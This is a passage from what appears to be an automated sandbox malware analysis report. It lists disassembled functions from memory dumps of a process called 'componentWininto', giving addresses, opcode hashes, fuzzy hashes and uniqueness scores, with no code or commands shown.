                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a7090681ec2cdfb6eda1419e6949dd639386e5362f208f1f26d44dbc9d646c16
                                                  • Instruction ID: 8d252a79b696ca1015fcd3965148c753d6a6055a89e039181a5f88ce1258c039
                                                  • Opcode Fuzzy Hash: a7090681ec2cdfb6eda1419e6949dd639386e5362f208f1f26d44dbc9d646c16
                                                  • Instruction Fuzzy Hash: AE119E30A0964E8FEB68EBA884696BD7BA0FF58304F0105BED41DC61F6DE75A644C741
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE4CFD Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8302d431fbaad28d535e5f9cb94da1f6975b9a11a51402dff64f97870a2bf209
                                                  • Instruction ID: b797ff08f02ba530be2db09bfa4906be66aa2189985b4f0026112622754c4e22
                                                  • Opcode Fuzzy Hash: 8302d431fbaad28d535e5f9cb94da1f6975b9a11a51402dff64f97870a2bf209
                                                  • Instruction Fuzzy Hash: 21118F30A0964E8FEB69EB6488A96BE7BA0FF18304F0105BED41DC71A6DE75A5408701
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADBBC5 Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e7f77356544b796f3e42809d93436e95db0b9b167ad2e6f15377242240f9098
                                                  • Instruction ID: 92b66d7362e378dfb74cb9f7b3088e1f992fc85add6da92b0f10b776dacaf783
                                                  • Opcode Fuzzy Hash: 0e7f77356544b796f3e42809d93436e95db0b9b167ad2e6f15377242240f9098
                                                  • Instruction Fuzzy Hash: 78118230E0A54D4FEB54EF64C4692BD7BE0FF59305F8109BAD41DC61A1DE75A640C700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBCB65 Relevance: .1, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f68a061fb5c4fc5b6f53200b5b5946e7e726a431682bbe9b7c813b40d0a20126
                                                  • Instruction ID: 6d15357e92f900c2c2b79ceedc07deb66a0d60958f7041ad38726de47e43e20e
                                                  • Opcode Fuzzy Hash: f68a061fb5c4fc5b6f53200b5b5946e7e726a431682bbe9b7c813b40d0a20126
                                                  • Instruction Fuzzy Hash: C601C030A0950E8EDB59EF54C4696BD7BA1EF68304F11547BD40EC30A5CB34A655C780
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD05D8 Relevance: .0, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c59440e39484b560db4d8051c15a442a8d750f4c2403857de3002cee43ff0c3a
                                                  • Instruction ID: b16ba279def7b7ef494dae5c4e552be653d4a5c423d369cb9c9753304070074f
                                                  • Opcode Fuzzy Hash: c59440e39484b560db4d8051c15a442a8d750f4c2403857de3002cee43ff0c3a
                                                  • Instruction Fuzzy Hash: 0801B130A0950E8FEB58EF65C0686B977E1FFA8305F51467ED40EC31A4CE76A660CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE2261 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: abb28589d159b439c3746ed8805a472110311560036e47b8669fe6da1d21fad1
                                                  • Instruction ID: 7738c9a27cde824189d2576c9819a8330744682d5ed5af7a821af43e3bdcc251
                                                  • Opcode Fuzzy Hash: abb28589d159b439c3746ed8805a472110311560036e47b8669fe6da1d21fad1
                                                  • Instruction Fuzzy Hash: 7801B570A0964D4FDB59DBA4C4696B97BA0FF15300F1104BED41AC60E2DE75A540CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADC03A Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 38e2a78bf79b023ff6cec9dd56a66e554d969d20c0198ab53721a93e3afed560
                                                  • Instruction ID: 2e608fe65eac3fd0d2d6bb039564d1627f1b8a06f01d9c6d386c2d98342c0a33
                                                  • Opcode Fuzzy Hash: 38e2a78bf79b023ff6cec9dd56a66e554d969d20c0198ab53721a93e3afed560
                                                  • Instruction Fuzzy Hash: 4C014030A0950E9FEB98EFA4C4682F97AE0FF58304F51097AE41DC21A1EE756650CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBA39C Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6e524b148c603ed40e947264ee6ce27225bd26398cfaec1f2aa6e94005323cf
                                                  • Instruction ID: 0e39c1545b3af125defdf783efed7be2ce3891cd3fc1e1a5f0771d1c8f31098c
                                                  • Opcode Fuzzy Hash: c6e524b148c603ed40e947264ee6ce27225bd26398cfaec1f2aa6e94005323cf
                                                  • Instruction Fuzzy Hash: F4016271B1DA5C4FEB58E7A8E8656EC77E1EF49320B05117AE10EC3293DE2969028B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBCB98 Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9c1fe5a330b04ef288675270c3328d9f16a381efff2b42cb2aaf5cf75ec2b90a
                                                  • Instruction ID: e492f2b2da17efd03cd52f1a5926be96d50fa3a957c1d7e68658cbaadf364fbb
                                                  • Opcode Fuzzy Hash: 9c1fe5a330b04ef288675270c3328d9f16a381efff2b42cb2aaf5cf75ec2b90a
                                                  • Instruction Fuzzy Hash: F9010830A5590E8EEB98FFA8C4696BE76E0FF18309F51187AD41ED31A5DB71A650CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD280D Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7b87b5cc50077ca926d6f7cc1a1404bce6bd5570f0896ba1a74bf52fdb93b837
                                                  • Instruction ID: 7be3343732528c1ccb6aece1696b62dc944be9ea7a0b6c84557d5dee14c508a7
                                                  • Opcode Fuzzy Hash: 7b87b5cc50077ca926d6f7cc1a1404bce6bd5570f0896ba1a74bf52fdb93b837
                                                  • Instruction Fuzzy Hash: 37018430A0A64E4FE7A1AFA4C4595ED7BE0EF99300F4246B6D418C60B5EA74E244C700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADAD48 Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dae28a70e129ceae996f503757c8e5966f0131f57a15335ee119e95d26062c2e
                                                  • Instruction ID: aa2f5f7534d69c64e60ef498b1a946152043c6cb79d665b332143b4d4e56f2b0
                                                  • Opcode Fuzzy Hash: dae28a70e129ceae996f503757c8e5966f0131f57a15335ee119e95d26062c2e
                                                  • Instruction Fuzzy Hash: E001D470A1950E8FDB58EF64C0692BD37E1FF98304F91457ED41EC21A4DE75A250CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD2EA9 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93418263b7c4de2d5de984c933875d6f2a313d6926bbf105fb62524993d1945c
                                                  • Instruction ID: d78861e8842763813b7d4d87194285d82418854f4ace76c7b708fdce410c9d4d
                                                  • Opcode Fuzzy Hash: 93418263b7c4de2d5de984c933875d6f2a313d6926bbf105fb62524993d1945c
                                                  • Instruction Fuzzy Hash: 2A018431A0A74E4FE751E7B4C8595A97BE0EF49300F0649B7D418CB0B6DF38A554CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB9F67 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a2fbe40f0ccaa24c5ad345c9f908a83188bc76ff35f78281f1a4173309e2e85
                                                  • Instruction ID: 29308b33bf83c6679f02b24017b112e438862e4a4c37efbf1d6b2bc7caf9e1e6
                                                  • Opcode Fuzzy Hash: 8a2fbe40f0ccaa24c5ad345c9f908a83188bc76ff35f78281f1a4173309e2e85
                                                  • Instruction Fuzzy Hash: FFF04E11A0F5D90FEB2866F808390E47F60DF2632474503F9D49E8B093ED1969558705
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBCB78 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9ecb5de1da1b3261660df2bc18b5080761290814b6cd28d67f15f0e6700ed171
                                                  • Instruction ID: 67bfbead0402da6ee3d5a6bffe47d249f3376b895f470a05b665d2f551bfb9f7
                                                  • Opcode Fuzzy Hash: 9ecb5de1da1b3261660df2bc18b5080761290814b6cd28d67f15f0e6700ed171
                                                  • Instruction Fuzzy Hash: 64017C30A0550E8ADBACEFA4C4656BE76A5FF68304F61957AE42EC31A5CB31A251CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAE7539 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f07dbe5c237f6b10a348a1ca5bed92ca35697a49796ec75b6c69ade4290ba3b5
                                                  • Instruction ID: 53802ed66d35b41241076edafe29081f0de6ecfa2675c67626da024a7e946d0d
                                                  • Opcode Fuzzy Hash: f07dbe5c237f6b10a348a1ca5bed92ca35697a49796ec75b6c69ade4290ba3b5
                                                  • Instruction Fuzzy Hash: 0F018430A1E64E4FE751EB74886D5A97BE1EF5A300F0648F6D418C70B6EA64A9448711
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADA9A9 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 95a1d053fd38aaa890afddc0e6267bec7e53878ee2361111f9144a2574050f77
                                                  • Instruction ID: 4105ed8a55a543fcb1cb7075543c2fe737cca356893bde803a25fd0c4674f0a0
                                                  • Opcode Fuzzy Hash: 95a1d053fd38aaa890afddc0e6267bec7e53878ee2361111f9144a2574050f77
                                                  • Instruction Fuzzy Hash: 7A01B130A4E68E4FE761AB74C8A96A97BE0EF45300F074AF7D108C70B6EA68A5448701
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD0610 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e9c64634fe435dae3cc077b794db93cac2b0e687a4ee2f44a11c549562f47b5
                                                  • Instruction ID: 85c51d96b85aa44721929c3c8f583d699ebaf5e67425421ba6ab3f58300bc5e4
                                                  • Opcode Fuzzy Hash: 9e9c64634fe435dae3cc077b794db93cac2b0e687a4ee2f44a11c549562f47b5
                                                  • Instruction Fuzzy Hash: 81018130A19A0E8BEB68EBA4C4686B977A0FF58305F11097ED41EC21E5DF75A690CA10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD0608 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bfef3f97d589e9243cbd4241e954fccc5faad744b85ddc491bcf6a933e314fec
                                                  • Instruction ID: 2b8ef2c788dd8d62ec64ea803dd14c1475cd851063a995b5645388524649c19f
                                                  • Opcode Fuzzy Hash: bfef3f97d589e9243cbd4241e954fccc5faad744b85ddc491bcf6a933e314fec
                                                  • Instruction Fuzzy Hash: 0B018130A1560E8BEBACEBA4C4686B973A0FF58305F51097ED41EC21E5DF75A250CA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD1C7D Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 841eda33de1e5303cfd1abf795b0cb3238224e65cdb6e9288be3db6dcb2ccb31
                                                  • Instruction ID: b123e3a444815113800f25212e4b8435083fbbdb31ced52d3115bfe5391ef71f
                                                  • Opcode Fuzzy Hash: 841eda33de1e5303cfd1abf795b0cb3238224e65cdb6e9288be3db6dcb2ccb31
                                                  • Instruction Fuzzy Hash: A8018170A0A64E8FEBA4DF55C4656F97BA1FFA5304F81067AE80CC21A1DAB5A650CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBACA6 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0f99d631ef6907b8195130dfe210c70df656f7ff1c94e3d2f06632d58c4a8172
                                                  • Instruction ID: 1bfa6bea19855aa05c611f852ca6bbf01f96e32b9d725c831c8bdd2b682b3ace
                                                  • Opcode Fuzzy Hash: 0f99d631ef6907b8195130dfe210c70df656f7ff1c94e3d2f06632d58c4a8172
                                                  • Instruction Fuzzy Hash: AFF0D625B19D5E4BD6A8EB68C4545A673D1EF58360B000A79D04FC71E6DE38B8458740
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD1240 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad5fafe659ad54717f11fd743aa2a3c2bd3b6df6eb7ca36dfb9014dac5f95ae5
                                                  • Instruction ID: 5405a52c5b972b58e6da1b69e15c7c643931fd7ec7dbecbe5738d7bb9c320f7e
                                                  • Opcode Fuzzy Hash: ad5fafe659ad54717f11fd743aa2a3c2bd3b6df6eb7ca36dfb9014dac5f95ae5
                                                  • Instruction Fuzzy Hash: 2CF0A470E1A65F4AEBA49BA888697FA77E0FFA6315F00027AD41DC20E1DE751254C640
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBE6BB Relevance: .0, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56a91dcb36e85efed9fa541888eba204e9c780906edcd666815b51ba593bf382
                                                  • Instruction ID: ded16188b1c252305ec0dae516551f6f814541ca3fb5d69dff677cb7ae577c60
                                                  • Opcode Fuzzy Hash: 56a91dcb36e85efed9fa541888eba204e9c780906edcd666815b51ba593bf382
                                                  • Instruction Fuzzy Hash: 92F0BB32F08E6C4FEBECC59854142AC73E1EB98350F41053BD00AE3261DE641D024781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAD05D0 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bad0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e43237b74341938d6917b0391ed73993ce7659c65273787d8972f81f09e90adb
                                                  • Instruction ID: 95aa0f77d20ad0dc0d14d9d5c2b6e4ae9d3cb7f5355ab1647e2a04b866565b35
                                                  • Opcode Fuzzy Hash: e43237b74341938d6917b0391ed73993ce7659c65273787d8972f81f09e90adb
                                                  • Instruction Fuzzy Hash: 4AF0FC30A0A54E8FEB64EF65C4655F977A0FF65309F41067AE80DC21E1CE75A650CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADAA15 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4054a295e865962aaa407f81fc20c326233fa58d1fd178ab4b187200ccd19d0a
                                                  • Instruction ID: 506d6ef28adf7aef6973b271b5f79eb93d124986ca41cb546ea6606acc40cc54
                                                  • Opcode Fuzzy Hash: 4054a295e865962aaa407f81fc20c326233fa58d1fd178ab4b187200ccd19d0a
                                                  • Instruction Fuzzy Hash: C3F0C23270E38A0FD7228759E8A11D97B74AF8221870A43F3C145CE0A3E95991098390
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB5592 Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b42f4e0c98fb85d73d9bb50855a18545da8c7050c1357730db5858e1d61eb5cf
                                                  • Instruction ID: 5c9be46375791a23a78a0d9961d50c3563f727ad9bfd2549befbce97cd4604a6
                                                  • Opcode Fuzzy Hash: b42f4e0c98fb85d73d9bb50855a18545da8c7050c1357730db5858e1d61eb5cf
                                                  • Instruction Fuzzy Hash: CEF0623284E2CA9FD3169BB088218E97FB4AF42325B1500E6E046C70B2C92C1716CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAF0EE2 Relevance: .0, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b5e1285abf7d295bc1512cb42d15c6efaf65dac3bb2714abebd5b0f8cbd79d2
                                                  • Instruction ID: 9b63b69c92ea62092351687494966a6db882554c3af9cb4349877ea89d1043d4
                                                  • Opcode Fuzzy Hash: 5b5e1285abf7d295bc1512cb42d15c6efaf65dac3bb2714abebd5b0f8cbd79d2
                                                  • Instruction Fuzzy Hash: 74F09031A4E38A9FD322CBB088615E67FA4EF43200B1A00F6E446CB0A2D96D560AC761
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BADC3F9 Relevance: .0, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BADA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BADA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bada000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1dc3117e239ae5f91f6d0342de6e106930420c9b160e79bac9f2e1fe55f9202b
                                                  • Instruction ID: dac5c4333d51d22e6f4840f96416299874de2bf328110601f45d0c79f5137b8a
                                                  • Opcode Fuzzy Hash: 1dc3117e239ae5f91f6d0342de6e106930420c9b160e79bac9f2e1fe55f9202b
                                                  • Instruction Fuzzy Hash: E801867050E78E8FDB659F6488292B93FB0FF55300F8205BBD459C60A2DB789654C741
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDB51D0 Relevance: .0, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bdb0000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92928bdd464c57989e41835d574332ef5ee8d9495ac60d2b8f35981633a67f75
                                                  • Instruction ID: 1f2a91e7b2d3e26ddcdc398f602688ea4310dd118d54b5489c61e02f6b8f26f9
                                                  • Opcode Fuzzy Hash: 92928bdd464c57989e41835d574332ef5ee8d9495ac60d2b8f35981633a67f75
                                                  • Instruction Fuzzy Hash: 52F06670919A5DCFCF99DB98C8A5AACBBB1FB69345F20019DC00AEB251CA71A941DF00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAEBAA2 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2247080947.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9bae1000_componentWininto.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 742537082e3610cf5b892af480e1f512a78b4fd903dd55fe6bc70faefc2170c2
                                                  • Instruction ID: eb9cb4fa6a760b0b42c436ff09fd994f7e8b2f5ad1406f7fcd9ac983de9a3be3
                                                  • Opcode Fuzzy Hash: 742537082e3610cf5b892af480e1f512a78b4fd903dd55fe6bc70faefc2170c2
                                                  • Instruction Fuzzy Hash: 45F0623154E2C99FD722CBB088A95D57FA4EF42314B5900E6D495870A2CA6D1646C751
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BDBDA72 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2271149674.00007FFD9BDB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BDB0000, based on PE: false
